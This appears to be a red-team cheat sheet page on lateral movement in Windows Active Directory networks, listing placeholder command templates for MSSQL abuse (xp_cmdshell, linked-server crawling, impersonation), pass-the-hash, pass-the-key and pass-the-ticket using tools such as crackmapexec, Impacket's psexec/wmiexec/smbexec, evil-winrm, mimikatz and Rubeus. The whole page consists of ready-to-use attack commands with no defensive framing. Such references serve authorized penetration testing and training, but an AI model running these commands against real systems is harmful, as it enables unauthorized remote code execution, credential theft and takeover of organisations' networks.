M4RCG04M

Lateral Move

MSSQL (Port 1397)

Find mssql access

cme mssql <ip> -u <user> -p <password> -d <domain>

Users with SQLAdmin (BloodHound)

MATCH p=(u:User)-[:SQLAdmin]->(c:Computer) RETURN p

Trust Link

Get-SQLServerLinkCrawl -username <user> -password <password> -Verbose -Instance <sqlInstance> -Query "<query>"
use exploit/windows

Log in

mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>
enum_db
xp_cmdshell <cmd>
exec_as_user <user>

exec_as_login <login>
sp_linkedservers

use_link

Local User

cme smb -u <user> -p <password> <ip> --local-auth
Impacket tools: same syntax as with a cleartext password, but without the <domain>/ prefix.

ClearText Password

Interactive Shell

psexec.py <domain>/<user>:<password>@<ip>
psexec.exe -AcceptEULA \\<ip>
mimikatz "privilege::debug" "sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>"

Pseudo-shell (file write and read)

smbexec.py <domain>/<user>:<password>@<ip> "command"
wmiexec.py <domain>/<user>:<password>@<ip>
crackmapexec smb <ip_range> -u <user> -p <password> -d <domain>

crackmapexec smb <ip_range> -u <user> -p <password> --local-auth

Protocols

evil-winrm -i <ip> -u <user> -p <password>
evil-winrm -i <ip> -c cert.pem -k key.pem -S
xfreerdp /u:<user> /p:<password> /v:<ip>
smbclient.py <domain>/<user>:<password>@<ip>
cme mssql <ip_range> -u <user> -p <password> -d <domain>
impacket-mssqlclient <user>@<ip> -windows-auth
mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>

NTLM Hash

Pass the Hash (PTH)

Interactive Shell

psexec.py -hashes ":<hash>" <user>@<ip>
psexec.exe -AcceptEULA \\<ip>
mimikatz "privilege::debug" "sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>"

Pseudo-shell (file write and read)

smbexec.py -hashes ":<hash>" <user>@<ip> "command"
wmiexec.py -hashes ":<hash>" <user>@<ip>
crackmapexec smb <ip_range> -u <user> -d <domain> -H ":<hash>"

crackmapexec smb <ip_range> -u <user> -H ":<hash>" -local-auth

Protocols

evil-winrm -i <ip> -u <user> -H <hash>
xfreerdp /u:<user> /d:<domain> /pth:<hash> /v:<ip>
smbclient.py -hashes ":<hash>" <user>@<ip>
cme mssql <ip_range> -u <user> -H ":<hash>"
mssqlclient.py -windows-auth -hashes ":<hash>" <domain>/<user>@<ip>

Pass the Key (PTK)

Kerberos

Pass the Ticket (ccache / kirbi)

mimikatz kerberos::ptc "<ticket>"

Export the TGS ticket

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
Invoke-Mimikatz -Command '"kerberos::ptt <ticket>"'

Rubeus.exe ptt /ticket:<ticket>


Last updated 3 months ago